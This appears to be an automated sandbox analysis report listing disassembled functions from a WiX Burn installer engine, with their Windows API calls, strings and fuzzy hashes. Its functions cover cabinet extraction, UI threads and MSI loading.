Instruction ID: 1058e5240e44d2be95e55127b90734aec84dd2233915c98363d3474f7712a4d8
Opcode Fuzzy Hash: ea0182dda575b436d1eb2aafc2b65e8a586dec350a0a4350ba1f5fd9914e6af0
Instruction Fuzzy Hash: D7228D71E80615AFDB249EB4EC81EADBBB9FF04344F206219F519BB251D731AE50CB50

Function 00E441D2 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00E4515E,?,?,00000000,?,?), ref: 00E441FE
InitializeCriticalSection.KERNEL32(000000D0,?,?,00E4515E,?,?,00000000,?,?), ref: 00E44207
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00E4515E,?,?,00000000,?,?), ref: 00E4424D
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00E4515E,?,?,00000000,?,?), ref: 00E44257
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00E4515E,?,?,00000000,?,?), ref: 00E4426B
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00E4515E,?,?,00000000,?,?), ref: 00E4427B
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00E4515E,?,?,00000000,?,?), ref: 00E442CB
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00E4515E,?,?,00000000,?,?), ref: 00E442D5
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00E4515E,?,?,00000000,?,?), ref: 00E442E9
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00E4515E,?,?,00000000,?,?), ref: 00E442F9

Strings

Missing required parameter for switch: %ls, xrefs: 00E4439F
user.cpp, xrefs: 00E44390, 00E443BC
Failed to initialize user section., xrefs: 00E44362
Failed to parse file handle: '%ls', xrefs: 00E4437D
burn.filehandle.self, xrefs: 00E442C6, 00E442CE, 00E442D3, 00E442D4, 00E442F4, 00E443C6
burn.filehandle.attached, xrefs: 00E44248, 00E44250, 00E44255, 00E44256, 00E44276, 00E4439A

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3039292287-3209860532
Opcode ID: 724f22c9fe93371e29189392d1b24ad1946cdfaa0f9ed79240ed037207013605
Instruction ID: 5ad3382e93d4fa136f00a575ef89d441456c1a6bce1314eeda52e644544cb737
Opcode Fuzzy Hash: 724f22c9fe93371e29189392d1b24ad1946cdfaa0f9ed79240ed037207013605
Instruction Fuzzy Hash: 215184B1B40216BFC724AF69EC46F9A77ACEB45B60F001116F61CF7290D770A950C7A4

Function 00E5E563 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 135registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 00E5E5AE
RegisterClassW.USER32(?), ref: 00E5E5DA
GetLastError.KERNEL32 ref: 00E5E5E5
CreateWindowExW.USER32(00000080,00E99CC4,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00E5E64C
GetLastError.KERNEL32 ref: 00E5E656
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00E5E6F4

Strings

uithread.cpp, xrefs: 00E5E609, 00E5E67A
Unexpected return value from message pump., xrefs: 00E5E6DF
Failed to create window., xrefs: 00E5E684
WixBurnMessageWindow, xrefs: 00E5E5D3, 00E5E6EF
Failed to register window., xrefs: 00E5E613

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 23231dc4338548e523f8689047d7beecb9a40d5f225103c793876e8843c39e2b
Instruction ID: 70d51a9abc343d55836e20a900092866e71957e6a76ffb2ba745cbc78da5c6f9
Opcode Fuzzy Hash: 23231dc4338548e523f8689047d7beecb9a40d5f225103c793876e8843c39e2b
Instruction Fuzzy Hash: 1A419272A00214EFDB149BA5DC49ADBBFE8FF08351F105526FD09F6290D7719A08CBA1

Function 00E829B3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E437EA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00E43829
Part of subcall function 00E437EA: GetLastError.KERNEL32 ref: 00E43833

Part of subcall function 00E84932: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00E8495A

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00E829FD
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00E82A20
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00E82A43
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00E82A66
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00E82A89
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00E82AAC
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00E82ACF

Strings

MsiGetProductInfoExW, xrefs: 00E82A70
MsiDeterminePatchSequenceW, xrefs: 00E829F2
MsiSourceListAddSourceExW, xrefs: 00E82AB6
MsiGetPatchInfoExW, xrefs: 00E82A4D
MsiEnumProductsExW, xrefs: 00E82A2A
MsiSetExternalUIRecord, xrefs: 00E82A93
MsiDetermineApplicablePatchesW, xrefs: 00E82A07
Msi.dll, xrefs: 00E829C5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: 3202e324f5061bc1aebf378b3a5f76dac3ec92acabcb02288be74c1123893a51
Instruction ID: ea4bdb1b6a2986219ef3dd5a949291cd8eee81e7f542ec6e7da12381269dc074
Opcode Fuzzy Hash: 3202e324f5061bc1aebf378b3a5f76dac3ec92acabcb02288be74c1123893a51
Instruction Fuzzy Hash: 6831CBB0A41308AFDB18DF66EC52A293AB5FBCF700745552EE409B62A2D771B908DB40

Function 00E4C129 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 128fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00E6AB22,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,?,?,00E6AB22), ref: 00E4C170
GetLastError.KERNEL32(?,00E6AB22), ref: 00E4C181
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,?,?,00E6AB22), ref: 00E4C1D0
GetCurrentProcess.KERNEL32(000000FF,00000000,?,00E6AB22), ref: 00E4C1D6
DuplicateHandle.KERNELBASE(00000000,?,00E6AB22), ref: 00E4C1D9
GetLastError.KERNEL32(?,00E6AB22), ref: 00E4C1E3
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00E6AB22), ref: 00E4C235
GetLastError.KERNEL32(?,00E6AB22), ref: 00E4C23F

Strings

Failed to duplicate handle to container: %ls, xrefs: 00E4C214
Failed to open file: %ls, xrefs: 00E4C1B2
Failed to move file pointer to container offset., xrefs: 00E4C26D
container.cpp, xrefs: 00E4C1A5, 00E4C207, 00E4C263
Failed to open container., xrefs: 00E4C28B

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
API String ID: 2619879409-2168299741
Opcode ID: 1a95ab46a2707380be3283349e45b300fbae563110939102988faea08f19df51
Instruction ID: a8e4d83ed332f8c05d5ebd5683342ae16c92e5c4a3f6c3e51d97b34e5caf930f
Opcode Fuzzy Hash: 1a95ab46a2707380be3283349e45b300fbae563110939102988faea08f19df51
Instruction Fuzzy Hash: 7741C432240301AFDB50AE6AAC48E573BE9EB85760F215129F91CFB291DA71C811DB64

Function 00E7FBAD Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00E7FBD5
GetProcAddress.KERNEL32(SystemFunction041), ref: 00E7FBE7
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00E7FC2A
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00E7FC3E
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00E7FC76
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00E7FC8A

Strings

Crypt32.dll, xrefs: 00E7FC0B
SystemFunction040, xrefs: 00E7FBCA
CryptUnprotectMemory, xrefs: 00E7FC6B
AdvApi32.dll, xrefs: 00E7FBB4
SystemFunction041, xrefs: 00E7FBD7
CryptProtectMemory, xrefs: 00E7FC1F
cryputil.cpp, xrefs: 00E7FC5F

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: 64ab5422d2685d68052eb4c3858507773c12cab7464b456350c9bd82f02113ba
Instruction ID: 440e8e846828c924a664dfafdb34391a4dda4871cda79180eb90aea2ac038c65
Opcode Fuzzy Hash: 64ab5422d2685d68052eb4c3858507773c12cab7464b456350c9bd82f02113ba
Instruction Fuzzy Hash: 4C21F631E41326DFE7226B37AD04B53B9D2AB1B744F069132EC18FB162E760BC049A94

Function 00E61484 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 103COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0000001C,?,00000000,00000000,00000000,00000000,?,00E4C285,00000000,00E6AB22,?,00E6AB22), ref: 00E614BB
GetLastError.KERNEL32(?,00E4C285,00000000,00E6AB22,?,00E6AB22), ref: 00E614C4

Strings

Failed to create begin operation event., xrefs: 00E614F2
Failed to create extraction thread., xrefs: 00E61584
Failed to copy file name., xrefs: 00E614A6
Failed to create operation complete event., xrefs: 00E61538
cabextract.cpp, xrefs: 00E614E8, 00E6152E, 00E6157A
Failed to wait for operation complete., xrefs: 00E61597

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
API String ID: 545576003-1680384675
Opcode ID: f0ab33b6b622da59bccffe754fcddb6b2a861656ffb6272c8a4c7bd5ee5ad574
Instruction ID: e7a8c80cad36f4875e46f4948218d0b5263c38828b338c539037cf2374ddf571
Opcode Fuzzy Hash: f0ab33b6b622da59bccffe754fcddb6b2a861656ffb6272c8a4c7bd5ee5ad574
Instruction Fuzzy Hash: 172109B2A807357EF72166796C46F6765DCEF447E0F052222BC0AF7590E754DC0046E1

Function 00E60627 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00E60657
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00E6066F
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00E60674
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00E60677
GetLastError.KERNEL32(?,?), ref: 00E60681
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00E606F0
GetLastError.KERNEL32(?,?), ref: 00E606FD

Strings

<the>.cab, xrefs: 00E60650
cabextract.cpp, xrefs: 00E606A5, 00E60721
Failed to add virtual file pointer for cab container., xrefs: 00E606D6
Failed to duplicate handle to cab container., xrefs: 00E606AF
Failed to open cabinet file: %hs, xrefs: 00E6072E

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 669bb8d8560962d4d06bf8967602c124cfad30f12ea525500f0088807322c376
Instruction ID: 055721d2a56da3a99f0b2bce0097e60e13751ba79f2da6c0f439d581115af20d
Opcode Fuzzy Hash: 669bb8d8560962d4d06bf8967602c124cfad30f12ea525500f0088807322c376
Instruction Fuzzy Hash: A031C172A41735BFEB20ABA69C49E9B7AE8EF047A0F110126FD08F7550D7209D108BE4

Function 00E52A60 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00E52ACD

Strings

wininet.dll, xrefs: 00E52D1E
Failed to check for remaining dependents during planning., xrefs: 00E52C73
Failed to allocate registration action., xrefs: 00E52B36
Failed to add registration action for self dependent., xrefs: 00E52D9E
crypt32.dll, xrefs: 00E52B18, 00E52C16, 00E52D0B, 00E52D80
Failed to add self-dependent to ignore dependents., xrefs: 00E52B51
Failed to create the string dictionary., xrefs: 00E52B06
Failed to add dependent bundle provider key to ignore dependents., xrefs: 00E52C37
Failed to add dependents ignored from command-line., xrefs: 00E52B82
Failed to add registration action for dependent related bundle., xrefs: 00E52DD5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: cb959d253b12b773c1f4b21e26abfa05867d52938bfda42df34d766986ab4209
Instruction ID: 5cbd245d31db10ebbfa85c160df79abc5856f755808d3541acd1731771893353
Opcode Fuzzy Hash: cb959d253b12b773c1f4b21e26abfa05867d52938bfda42df34d766986ab4209
Instruction Fuzzy Hash: 5EB18B71A00216EFCF29DF64C881BAABBB1BF45316F00996DFE04BA252D770D954DB90

Function 00E449DF Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00E44B5E
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E44B6F

Strings

Failed while running , xrefs: 00E44B24
Failed to open log., xrefs: 00E44A12
Failed to set action variables., xrefs: 00E44ABE
Failed to create the message window., xrefs: 00E44A92
Failed to query registration., xrefs: 00E44AA8
Failed to check global conditions, xrefs: 00E44A43
Failed to set registration variables., xrefs: 00E44AD8
Failed to set layout directory variable to value provided from command-line., xrefs: 00E44B00
WixBundleLayoutDirectory, xrefs: 00E44AEF

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 28b5387bad33e2f924ad4a2ff7f29fb809d66e677036ead3b00077306c97295c
Instruction ID: 023655d5f53200b85ad43c16932fbdace4d3880fe49eb14717708a6a63b19f91
Opcode Fuzzy Hash: 28b5387bad33e2f924ad4a2ff7f29fb809d66e677036ead3b00077306c97295c
Instruction Fuzzy Hash: 7C41C5B1B40B1ABBDB2A6A60EC45FBBB69CFF04755F003215F808B6591EB60ED1497D0

Function 00E4CABE Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,?,000000FF,00E45381,?,00E452B5,00000000,00E45381,FFF9E89D,00E45381,00E453B5,00E4533D,?), ref: 00E4CB15

Strings

Failed to get next stream., xrefs: 00E4CBFC
Failed to extract file., xrefs: 00E4CBE0
=S, xrefs: 00E4CADC, 00E4CBB7
=S, xrefs: 00E4CB77, 00E4CC44
Failed to find embedded payload: %ls, xrefs: 00E4CB41
Failed to concat file paths., xrefs: 00E4CBF5
Payload was not found in container: %ls, xrefs: 00E4CC22
Failed to ensure directory exists, xrefs: 00E4CBE7
Failed to get directory portion of local file path, xrefs: 00E4CBEE
payload.cpp, xrefs: 00E4CC16

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: =S$=S$Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1253357791
Opcode ID: 2aab29e0d023e2db9c1c6b9bf02d07025f009052474496e43dfb4943fc48b8f4
Instruction ID: e18dbae5a7cdf63e941a4cb1b8a22ae51f67ece17cc6929cc24f8139c642779a
Opcode Fuzzy Hash: 2aab29e0d023e2db9c1c6b9bf02d07025f009052474496e43dfb4943fc48b8f4
Instruction Fuzzy Hash: BB41C331902219EFCF65EF85ED829AEB7B5EF40720F306169E919BB261C7709D40DB90

Function 00E5E82A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 99threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00E45386,?,?), ref: 00E5E84A
GetLastError.KERNEL32(?,00E45386,?,?), ref: 00E5E857
CreateThread.KERNELBASE(00000000,00000000,Function_0001E563,?,00000000,00000000), ref: 00E5E8B0
GetLastError.KERNEL32(?,00E45386,?,?), ref: 00E5E8BD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00E45386,?,?), ref: 00E5E8F8
CloseHandle.KERNEL32(00000000,?,00E45386,?,?), ref: 00E5E917
CloseHandle.KERNELBASE(?,?,00E45386,?,?), ref: 00E5E924

Strings

uithread.cpp, xrefs: 00E5E878, 00E5E8DE
Failed to create initialization event., xrefs: 00E5E882
Failed to create the UI thread., xrefs: 00E5E8E8

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 5e2d05ff414f74d876b67ba83faa776f3393a267a87939f2802ef689c0e79153
Instruction ID: 589bdc55eed275f8cbef56b4cfb3d58fbd43c657a090326f5e4707e6c900b388
Opcode Fuzzy Hash: 5e2d05ff414f74d876b67ba83faa776f3393a267a87939f2802ef689c0e79153
Instruction Fuzzy Hash: 17314371E00319BFEB149FA99D84AAFB6E8EB08351F11416AED05F7251D6318E0487A1

Function 00E61224 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,00000000,76232F60,?,00000000,?,?,?,00000000), ref: 00E61249
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,00E6B555,?,?,80000000,?,?,?,?,?), ref: 00E6125C
GetExitCodeThread.KERNELBASE(?,?,?,?,00000000,?,?,?,?,00E6B555,?,?,80000000,?,?,?), ref: 00E6129E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,00E6B555,?,?,80000000,?,?,?,?,?), ref: 00E612AC
ResetEvent.KERNEL32(?,?,?,00000000,?,?,?,?,00E6B555,?,?,80000000,?,?,?,?), ref: 00E612E7
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,00E6B555,?,?,80000000,?,?,?,?,?), ref: 00E612F1

Strings

Failed to wait for operation complete event., xrefs: 00E6128D
Failed to get extraction thread exit code., xrefs: 00E612DD
Failed to reset operation complete event., xrefs: 00E61322
cabextract.cpp, xrefs: 00E61280, 00E612D0, 00E61315

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 383e296a774c3a1288010e531a685e5f019c45abefa017db64c9323e7a47b631
Instruction ID: 97901f68c2242ef8664eb1cec64cbe4da579f237ab0a3fc48f612444f75fe332
Opcode Fuzzy Hash: 383e296a774c3a1288010e531a685e5f019c45abefa017db64c9323e7a47b631
Instruction Fuzzy Hash: B721C571780304EFEB149B76AD06ABE76E4EF04710F10416EB84BF62A0E734C9009B55

Function 00E4D5C0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,?,00E446F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00E45386,?,?), ref: 00E4D5CD
GetLastError.KERNEL32(?,00E446F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00E45386,?,?), ref: 00E4D5DA
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00E4D612
GetLastError.KERNEL32(?,00E446F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00E45386,?,?), ref: 00E4D61E

Strings

wininet.dll, xrefs: 00E4D5F8, 00E4D63C, 00E4D667
Failed to create UX., xrefs: 00E4D662
Failed to load UX DLL., xrefs: 00E4D605
BootstrapperApplicationCreate, xrefs: 00E4D60C
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 00E4D649
userexperience.cpp, xrefs: 00E4D5FB, 00E4D63F

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

